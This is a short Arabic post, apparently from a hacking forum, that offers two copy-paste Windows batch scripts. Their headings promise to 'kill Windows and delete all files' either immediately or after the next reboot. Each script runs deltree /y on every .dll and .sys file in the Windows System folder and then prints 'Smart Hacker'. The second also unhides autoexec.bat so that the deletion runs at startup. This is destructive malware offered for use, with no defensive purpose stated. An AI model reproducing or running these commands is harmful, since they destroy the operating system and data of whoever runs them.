قتل الوندوز وحذف كل الملفات بعد التشغيل مباشره
انسخ
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
echo Smart Hacker
قتل الوندوز وحذف كل الملفات بعد اول اعادة تشغيل للجهاز
انسخ
call attrib -h -r c:autoexec.bat >nul
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
echo Smart Hacker